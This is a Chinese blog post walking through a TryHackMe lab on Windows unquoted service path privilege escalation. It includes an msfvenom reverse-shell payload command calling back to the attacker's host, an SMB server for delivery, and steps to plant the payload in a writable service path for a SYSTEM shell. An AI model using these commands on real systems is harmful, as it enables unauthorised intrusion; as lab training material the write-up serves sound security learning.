点击蓝字 关注我们

0x00:在线漏洞平台利用

前面准备我就摸鱼了，跟上一篇几乎一样，除了改改IP地址就可了。本次的在线漏洞平台是Try hack me具体链接为https://tryhackme.com/room/windows10privesc。可以使用平台所提供的网页kali版，或者是用自己kali连到他们内网里面都可。

攻击机: kali ip 10.4.37.12

目标机器:windows10 ip 10.10.111.139

首先使用xfreerdp进行远程连接

命令: xfreerdp /u:user /p:password321 /cert:ignore /v:10.10.111.139

0x01:制作反弹shell+传送到目标机器

为了控制一波我们的windows10,我们得先在kali本地制作一个反弹shell先。

命令:

msfvenom -p windows/x64/shell_reverse_tcp LHOST=10.4.37.12 LPORT=667 -f exe -o reverseshell.exe

关于传送的到目标机器可以用kali自带的smbserver

命令: sudo python3 /usr/share/doc/python3-impacket/examples/smbserver.py kali .

然后在我们的windows10的CMD命令行模式下输入

命令:copy \10.4.37.12kalirevershell.exe C:PrivEscreverseshell.exe

然后去到我们刚才存放的地方，记得提前在kali处打开波端口。一个点击就能获得了。

0x02:没引号的服务路径提权

现在进入正题，由于网页版只提供命令，也没有很细致的讲解，只能自己再网上找点额外的资料理解一波原理。参考一下大佬的思路

       在正常情况下，如果Windows启动了某个服务，Windows会自动搜索它的二进制文件(BINARY_PATH_NAME)来运行。当运行服务时,如果给出了可执行文件+完整路径如下图所示,这种有引号括起来的完整路径，系统会按照位置执行。

与之相比如果服务的二进制路径没有引号的话，系统会执行找到的空格分隔的服务路径的第一个实例。

当然上面这个例子其实不太好这里引用了https://blog.csdn.net/weixin_44032232/article/details/109073666 这位大佬的解释

比如说现在有个服务的路径是c:program files (x86)grasssoftmacro expertMacroService.exe

那么会根据以下顺序依次读取(有空格就停止一次)

1.c:program.exe

2.c:program files.exe

3.c:program file (x86)grasssoftmacro.exe

4.c:program files (x86)grasssoftmacro expertMacroService.exe

首先在用nc连接好目标机以后用sc qc 查询unquotedsvc服务可以看到服务路径(BINARY_PATH_NAME)未用引号且SERVICE_START_NAME显示目前这个服务是System权限。

然后用accesschk.exe 检测一波unquotedsvc谁可以使用,当然可以看到作为普通的users也可以更改。

(/accepteula=自动接收许可协议 -u=不显示错误 -w=显示谁有可写权限 -d=只处理目录或顶级建 -q=忽略banner)

那我们可以使用copy大法把我们的反弹文件指向unquoted 的commonfiles里面

最后用net start 启动回服务,提前开启nc得到一个更高的权限。

0x03:引用的资料

Windows提权 不带引号的服务路径提权https://blog.csdn.net/weixin_44032232/article/details/109073666

Accesschk使用指南 https://docs.microsoft.com/zh-cn/sysinternals/downloads/accesschk

Windows 本地提权相关的技术总结 https://blog.wuhao13.xin/1359.html

原文始发于微信公众号（神隐攻防实验室）：Windows提权(2.服务配置错误之没引号的服务路径提权)